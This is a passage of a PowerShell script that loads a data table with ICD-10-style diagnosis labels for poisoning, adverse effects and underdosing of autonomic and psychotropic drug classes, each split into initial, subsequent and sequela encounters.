sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified psychotropic drug, accidental (unintentional)","Poisoning by unspecified psychotropic drug, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified psychotropic drug, accidental (unintentional)","Poisoning by unspecified psychotropic drug, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified psychotropic drug, accidental (unintentional)","Poisoning by unspecified psychotropic drug, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified psychotropic drug, intentional self-harm","Poisoning by unspecified psychotropic drug, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified psychotropic drug, intentional self-harm","Poisoning by unspecified psychotropic drug, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified psychotropic drug, intentional self-harm","Poisoning by unspecified psychotropic drug, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified psychotropic drug, assault","Poisoning by unspecified psychotropic drug, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified psychotropic drug, assault","Poisoning by unspecified psychotropic drug, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified psychotropic drug, assault","Poisoning by unspecified psychotropic drug, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified psychotropic drug, undetermined","Poisoning by unspecified psychotropic drug, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified psychotropic drug, undetermined","Poisoning by unspecified psychotropic drug, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified psychotropic drug, undetermined","Poisoning by unspecified psychotropic drug, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of unspecified psychotropic drug","Adverse effect of unspecified psychotropic drug, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of unspecified psychotropic drug","Adverse effect of unspecified psychotropic drug, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of unspecified psychotropic drug","Adverse effect of unspecified psychotropic drug, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of unspecified psychotropic drug","Underdosing of unspecified psychotropic drug, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of unspecified psychotropic drug","Underdosing of unspecified psychotropic drug, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of unspecified psychotropic drug","Underdosing of unspecified psychotropic drug, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by anticholinesterase agents, accidental (unintentional)","Poisoning by anticholinesterase agents, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by anticholinesterase agents, accidental (unintentional)","Poisoning by anticholinesterase agents, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by anticholinesterase agents, accidental (unintentional)","Poisoning by anticholinesterase agents, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by anticholinesterase agents, intentional self-harm","Poisoning by anticholinesterase agents, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by anticholinesterase agents, intentional self-harm","Poisoning by anticholinesterase agents, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by anticholinesterase agents, intentional self-harm","Poisoning by anticholinesterase agents, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by anticholinesterase agents, assault","Poisoning by anticholinesterase agents, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by anticholinesterase agents, assault","Poisoning by anticholinesterase agents, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by anticholinesterase agents, assault","Poisoning by anticholinesterase agents, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by anticholinesterase agents, undetermined","Poisoning by anticholinesterase agents, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by anticholinesterase agents, undetermined","Poisoning by anticholinesterase agents, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by anticholinesterase agents, undetermined","Poisoning by anticholinesterase agents, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of anticholinesterase agents","Adverse effect of anticholinesterase agents, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of anticholinesterase agents","Adverse effect of anticholinesterase agents, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of anticholinesterase agents","Adverse effect of anticholinesterase agents, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of anticholinesterase agents","Underdosing of anticholinesterase agents, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of anticholinesterase agents","Underdosing of anticholinesterase agents, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of anticholinesterase agents","Underdosing of anticholinesterase agents, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other parasympathomimetics [cholinergics], accidental (unintentional)","Poisoning by other parasympathomimetics [cholinergics], accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other parasympathomimetics [cholinergics], accidental (unintentional)","Poisoning by other parasympathomimetics [cholinergics], accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other parasympathomimetics [cholinergics], accidental (unintentional)","Poisoning by other parasympathomimetics [cholinergics], accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other parasympathomimetics [cholinergics], intentional self-harm","Poisoning by other parasympathomimetics [cholinergics], intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other parasympathomimetics [cholinergics], intentional self-harm","Poisoning by other parasympathomimetics [cholinergics], intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other parasympathomimetics [cholinergics], intentional self-harm","Poisoning by other parasympathomimetics [cholinergics], intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other parasympathomimetics [cholinergics], assault","Poisoning by other parasympathomimetics [cholinergics], assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other parasympathomimetics [cholinergics], assault","Poisoning by other parasympathomimetics [cholinergics], assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other parasympathomimetics [cholinergics], assault","Poisoning by other parasympathomimetics [cholinergics], assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other parasympathomimetics [cholinergics], undetermined","Poisoning by other parasympathomimetics [cholinergics], undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other parasympathomimetics [cholinergics], undetermined","Poisoning by other parasympathomimetics [cholinergics], undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other parasympathomimetics [cholinergics], undetermined","Poisoning by other parasympathomimetics [cholinergics], undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of other parasympathomimetics [cholinergics]","Adverse effect of other parasympathomimetics [cholinergics], initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of other parasympathomimetics [cholinergics]","Adverse effect of other parasympathomimetics [cholinergics], subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of other parasympathomimetics [cholinergics]","Adverse effect of other parasympathomimetics [cholinergics], sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of other parasympathomimetics","Underdosing of other parasympathomimetics, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of other parasympathomimetics","Underdosing of other parasympathomimetics, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of other parasympathomimetics","Underdosing of other parasympathomimetics, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by ganglionic blocking drugs, accidental (unintentional)","Poisoning by ganglionic blocking drugs, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by ganglionic blocking drugs, accidental (unintentional)","Poisoning by ganglionic blocking drugs, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by ganglionic blocking drugs, accidental (unintentional)","Poisoning by ganglionic blocking drugs, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by ganglionic blocking drugs, intentional self-harm","Poisoning by ganglionic blocking drugs, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by ganglionic blocking drugs, intentional self-harm","Poisoning by ganglionic blocking drugs, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by ganglionic blocking drugs, intentional self-harm","Poisoning by ganglionic blocking drugs, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by ganglionic blocking drugs, assault","Poisoning by ganglionic blocking drugs, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by ganglionic blocking drugs, assault","Poisoning by ganglionic blocking drugs, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by ganglionic blocking drugs, assault","Poisoning by ganglionic blocking drugs, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by ganglionic blocking drugs, undetermined","Poisoning by ganglionic blocking drugs, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by ganglionic blocking drugs, undetermined","Poisoning by ganglionic blocking drugs, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by ganglionic blocking drugs, undetermined","Poisoning by ganglionic blocking drugs, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of ganglionic blocking drugs","Adverse effect of ganglionic blocking drugs, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of ganglionic blocking drugs","Adverse effect of ganglionic blocking drugs, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of ganglionic blocking drugs","Adverse effect of ganglionic blocking drugs, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of ganglionic blocking drugs","Underdosing of ganglionic blocking drugs, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of ganglionic blocking drugs","Underdosing of ganglionic blocking drugs, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of ganglionic blocking drugs","Underdosing of ganglionic blocking drugs, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other parasympatholytics [anticholinergics and antimuscarinics] and spasmolytics, accidental (unintentional)","Poisoning by other parasympatholytics [anticholinergics and antimuscarinics] and spasmolytics, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other parasympatholytics [anticholinergics and antimuscarinics] and spasmolytics, accidental (unintentional)","Poisoning by other parasympatholytics [anticholinergics and antimuscarinics] and spasmolytics, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other parasympatholytics [anticholinergics and antimuscarinics] and spasmolytics, accidental (unintentional)","Poisoning by other parasympatholytics [anticholinergics and antimuscarinics] and spasmolytics, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other parasympatholytics [anticholinergics and antimuscarinics] and spasmolytics, intentional self-harm","Poisoning by other parasympatholytics [anticholinergics and antimuscarinics] and spasmolytics, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other parasympatholytics [anticholinergics and antimuscarinics] and spasmolytics, intentional self-harm","Poisoning by other parasympatholytics [anticholinergics and antimuscarinics] and spasmolytics, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other parasympatholytics [anticholinergics and antimuscarinics] and spasmolytics, intentional self-harm","Poisoning by other parasympatholytics [anticholinergics and antimuscarinics] and spasmolytics, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other parasympatholytics [anticholinergics and antimuscarinics] and spasmolytics, assault","Poisoning by other parasympatholytics [anticholinergics and antimuscarinics] and spasmolytics, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other parasympatholytics [anticholinergics and antimuscarinics] and spasmolytics, assault","Poisoning by other parasympatholytics [anticholinergics and antimuscarinics] and spasmolytics, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other parasympatholytics [anticholinergics and antimuscarinics] and spasmolytics, assault","Poisoning by other parasympatholytics [anticholinergics and antimuscarinics] and spasmolytics, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other parasympatholytics [anticholinergics and antimuscarinics] and spasmolytics, undetermined","Poisoning by other parasympatholytics [anticholinergics and antimuscarinics] and spasmolytics, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other parasympatholytics [anticholinergics and antimuscarinics] and spasmolytics, undetermined","Poisoning by other parasympatholytics [anticholinergics and antimuscarinics] and spasmolytics, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other parasympatholytics [anticholinergics and antimuscarinics] and spasmolytics, undetermined","Poisoning by other parasympatholytics [anticholinergics and antimuscarinics] and spasmolytics, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of other parasympatholytics [anticholinergics and antimuscarinics] and spasmolytics","Adverse effect of other parasympatholytics [anticholinergics and antimuscarinics] and spasmolytics, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of other parasympatholytics [anticholinergics and antimuscarinics] and spasmolytics","Adverse effect of other parasympatholytics [anticholinergics and antimuscarinics] and spasmolytics, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of other parasympatholytics [anticholinergics and antimuscarinics] and spasmolytics","Adverse effect of other parasympatholytics [anticholinergics and antimuscarinics] and spasmolytics, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of other parasympatholytics [anticholinergics and antimuscarinics] and spasmolytics","Underdosing of other parasympatholytics [anticholinergics and antimuscarinics] and spasmolytics, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of other parasympatholytics [anticholinergics and antimuscarinics] and spasmolytics","Underdosing of other parasympatholytics [anticholinergics and antimuscarinics] and spasmolytics, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of other parasympatholytics [anticholinergics and antimuscarinics] and spasmolytics","Underdosing of other parasympatholytics [anticholinergics and antimuscarinics] and spasmolytics, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by predominantly alpha-adrenoreceptor agonists, accidental (unintentional)","Poisoning by predominantly alpha-adrenoreceptor agonists, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by predominantly alpha-adrenoreceptor agonists, accidental (unintentional)","Poisoning by predominantly alpha-adrenoreceptor agonists, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by predominantly alpha-adrenoreceptor agonists, accidental (unintentional)","Poisoning by predominantly alpha-adrenoreceptor agonists, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by predominantly alpha-adrenoreceptor agonists, intentional self-harm","Poisoning by predominantly alpha-adrenoreceptor agonists, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by predominantly alpha-adrenoreceptor agonists, intentional self-harm","Poisoning by predominantly alpha-adrenoreceptor agonists, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by predominantly alpha-adrenoreceptor agonists, intentional self-harm","Poisoning by predominantly alpha-adrenoreceptor agonists, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by predominantly alpha-adrenoreceptor agonists, assault","Poisoning by predominantly alpha-adrenoreceptor agonists, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by predominantly alpha-adrenoreceptor agonists, assault","Poisoning by predominantly alpha-adrenoreceptor agonists, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by predominantly alpha-adrenoreceptor agonists, assault","Poisoning by predominantly alpha-adrenoreceptor agonists, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by predominantly alpha-adrenoreceptor agonists, undetermined","Poisoning by predominantly alpha-adrenoreceptor agonists, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by predominantly alpha-adrenoreceptor agonists, undetermined","Poisoning by predominantly alpha-adrenoreceptor agonists, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by predominantly alpha-adrenoreceptor agonists, undetermined","Poisoning by predominantly alpha-adrenoreceptor agonists, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of predominantly alpha-adrenoreceptor agonists","Adverse effect of predominantly alpha-adrenoreceptor agonists, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of predominantly alpha-adrenoreceptor agonists","Adverse effect of predominantly alpha-adrenoreceptor agonists, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of predominantly alpha-adrenoreceptor agonists","Adverse effect of predominantly alpha-adrenoreceptor agonists, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of predominantly alpha-adrenoreceptor agonists","Underdosing of predominantly alpha-adrenoreceptor agonists, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of predominantly alpha-adrenoreceptor agonists","Underdosing of predominantly alpha-adrenoreceptor agonists, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of predominantly alpha-adrenoreceptor agonists","Underdosing of predominantly alpha-adrenoreceptor agonists, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by predominantly beta-adrenoreceptor agonists, accidental (unintentional)","Poisoning by predominantly beta-adrenoreceptor agonists, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by predominantly beta-adrenoreceptor agonists, accidental (unintentional)","Poisoning by predominantly beta-adrenoreceptor agonists, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by predominantly beta-adrenoreceptor agonists, accidental (unintentional)","Poisoning by predominantly beta-adrenoreceptor agonists, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by predominantly beta-adrenoreceptor agonists, intentional self-harm","Poisoning by predominantly beta-adrenoreceptor agonists, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by predominantly beta-adrenoreceptor agonists, intentional self-harm","Poisoning by predominantly beta-adrenoreceptor agonists, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by predominantly beta-adrenoreceptor agonists, intentional self-harm","Poisoning by predominantly beta-adrenoreceptor agonists, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by predominantly beta-adrenoreceptor agonists, assault","Poisoning by predominantly beta-adrenoreceptor agonists, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by predominantly beta-adrenoreceptor agonists, assault","Poisoning by predominantly beta-adrenoreceptor agonists, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by predominantly beta-adrenoreceptor agonists, assault","Poisoning by predominantly beta-adrenoreceptor agonists, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by predominantly beta-adrenoreceptor agonists, undetermined","Poisoning by predominantly beta-adrenoreceptor agonists, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by predominantly beta-adrenoreceptor agonists, undetermined","Poisoning by predominantly beta-adrenoreceptor agonists, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by predominantly beta-adrenoreceptor agonists, undetermined","Poisoning by predominantly beta-adrenoreceptor agonists, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of predominantly beta-adrenoreceptor agonists","Adverse effect of predominantly beta-adrenoreceptor agonists, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of predominantly beta-adrenoreceptor agonists","Adverse effect of predominantly beta-adrenoreceptor agonists, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of predominantly beta-adrenoreceptor agonists","Adverse effect of predominantly beta-adrenoreceptor agonists, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of predominantly beta-adrenoreceptor agonists","Underdosing of predominantly beta-adrenoreceptor agonists, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of predominantly beta-adrenoreceptor agonists","Underdosing of predominantly beta-adrenoreceptor agonists, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of predominantly beta-adrenoreceptor agonists","Underdosing of predominantly beta-adrenoreceptor agonists, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by alpha-adrenoreceptor antagonists, accidental (unintentional)","Poisoning by alpha-adrenoreceptor antagonists, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by alpha-adrenoreceptor antagonists, accidental (unintentional)","Poisoning by alpha-adrenoreceptor antagonists, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by alpha-adrenoreceptor antagonists, accidental (unintentional)","Poisoning by alpha-adrenoreceptor antagonists, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by alpha-adrenoreceptor antagonists, intentional self-harm","Poisoning by alpha-adrenoreceptor antagonists, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by alpha-adrenoreceptor antagonists, intentional self-harm","Poisoning by alpha-adrenoreceptor antagonists, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by alpha-adrenoreceptor antagonists, intentional self-harm","Poisoning by alpha-adrenoreceptor antagonists, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by alpha-adrenoreceptor antagonists, assault","Poisoning by alpha-adrenoreceptor antagonists, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by alpha-adrenoreceptor antagonists, assault","Poisoning by alpha-adrenoreceptor antagonists, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by alpha-adrenoreceptor antagonists, assault","Poisoning by alpha-adrenoreceptor antagonists, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by alpha-adrenoreceptor antagonists, undetermined","Poisoning by alpha-adrenoreceptor antagonists, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by alpha-adrenoreceptor antagonists, undetermined","Poisoning by alpha-adrenoreceptor antagonists, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by alpha-adrenoreceptor antagonists, undetermined","Poisoning by alpha-adrenoreceptor antagonists, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of alpha-adrenoreceptor antagonists","Adverse effect of alpha-adrenoreceptor antagonists, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of alpha-adrenoreceptor antagonists","Adverse effect of alpha-adrenoreceptor antagonists, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of alpha-adrenoreceptor antagonists","Adverse effect of alpha-adrenoreceptor antagonists, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of alpha-adrenoreceptor antagonists","Underdosing of alpha-adrenoreceptor antagonists, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of alpha-adrenoreceptor antagonists","Underdosing of alpha-adrenoreceptor antagonists, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of alpha-adrenoreceptor antagonists","Underdosing of alpha-adrenoreceptor antagonists, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by beta-adrenoreceptor antagonists, accidental (unintentional)","Poisoning by beta-adrenoreceptor antagonists, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by beta-adrenoreceptor antagonists, accidental (unintentional)","Poisoning by beta-adrenoreceptor antagonists, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by beta-adrenoreceptor antagonists, accidental (unintentional)","Poisoning by beta-adrenoreceptor antagonists, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by beta-adrenoreceptor antagonists, intentional self-harm","Poisoning by beta-adrenoreceptor antagonists, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by beta-adrenoreceptor antagonists, intentional self-harm","Poisoning by beta-adrenoreceptor antagonists, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by beta-adrenoreceptor antagonists, intentional self-harm","Poisoning by beta-adrenoreceptor antagonists, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by beta-adrenoreceptor antagonists, assault","Poisoning by beta-adrenoreceptor antagonists, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by beta-adrenoreceptor antagonists, assault","Poisoning by beta-adrenoreceptor antagonists, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by beta-adrenoreceptor antagonists, assault","Poisoning by beta-adrenoreceptor antagonists, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by beta-adrenoreceptor antagonists, undetermined","Poisoning by beta-adrenoreceptor antagonists, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by beta-adrenoreceptor antagonists, undetermined","Poisoning by beta-adrenoreceptor antagonists, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by beta-adrenoreceptor antagonists, undetermined","Poisoning by beta-adrenoreceptor antagonists, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of beta-adrenoreceptor antagonists","Adverse effect of beta-adrenoreceptor antagonists, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of beta-adrenoreceptor antagonists","Adverse effect of beta-adrenoreceptor antagonists, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of beta-adrenoreceptor antagonists","Adverse effect of beta-adrenoreceptor antagonists, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of beta-adrenoreceptor antagonists","Underdosing of beta-adrenoreceptor antagonists, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of beta-adrenoreceptor antagonists","Underdosing of beta-adrenoreceptor antagonists, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of beta-adrenoreceptor antagonists","Underdosing of beta-adrenoreceptor antagonists, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by centrally-acting and adrenergic-neuron-blocking agents, accidental (unintentional)","Poisoning by centrally-acting and adrenergic-neuron-blocking agents, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by centrally-acting and adrenergic-neuron-blocking agents, accidental (unintentional)","Poisoning by centrally-acting and adrenergic-neuron-blocking agents, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by centrally-acting and adrenergic-neuron-blocking agents, accidental (unintentional)","Poisoning by centrally-acting and adrenergic-neuron-blocking agents, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by centrally-acting and adrenergic-neuron-blocking agents, intentional self-harm","Poisoning by centrally-acting and adrenergic-neuron-blocking agents, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by centrally-acting and adrenergic-neuron-blocking agents, intentional self-harm","Poisoning by centrally-acting and adrenergic-neuron-blocking agents, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by centrally-acting and adrenergic-neuron-blocking agents, intentional self-harm","Poisoning by centrally-acting and adrenergic-neuron-blocking agents, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by centrally-acting and adrenergic-neuron-blocking agents, assault","Poisoning by centrally-acting and adrenergic-neuron-blocking agents, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by centrally-acting and adrenergic-neuron-blocking agents, assault","Poisoning by centrally-acting and adrenergic-neuron-blocking agents, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by centrally-acting and adrenergic-neuron-blocking agents, assault","Poisoning by centrally-acting and adrenergic-neuron-blocking agents, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by centrally-acting and adrenergic-neuron-blocking agents, undetermined","Poisoning by centrally-acting and adrenergic-neuron-blocking agents, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by centrally-acting and adrenergic-neuron-blocking agents, undetermined","Poisoning by centrally-acting and adrenergic-neuron-blocking agents, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by centrally-acting and adrenergic-neuron-blocking agents, undetermined","Poisoning by centrally-acting and adrenergic-neuron-blocking agents, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of centrally-acting and adrenergic-neuron-blocking agents","Adverse effect of centrally-acting and adrenergic-neuron-blocking agents, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of centrally-acting and adrenergic-neuron-blocking agents","Adverse effect of centrally-acting and adrenergic-neuron-blocking agents, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of centrally-acting and adrenergic-neuron-blocking agents","Adverse effect of centrally-acting and adrenergic-neuron-blocking agents, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of centrally-acting and adrenergic-neuron-blocking agents","Underdosing of centrally-acting and adrenergic-neuron-blocking agents, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of centrally-acting and adrenergic-neuron-blocking agents","Underdosing of centrally-acting and adrenergic-neuron-blocking agents, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of centrally-acting and adrenergic-neuron-blocking agents","Underdosing of centrally-acting and adrenergic-neuron-blocking agents, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified drugs primarily affecting the autonomic nervous system, accidental (unintentional)","Poisoning by unspecified drugs primarily affecting the autonomic nervous system, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified drugs primarily affecting the autonomic nervous system, accidental (unintentional)","Poisoning by unspecified drugs primarily affecting the autonomic nervous system, accidental (unintentional), subsequent encounter") + $null = 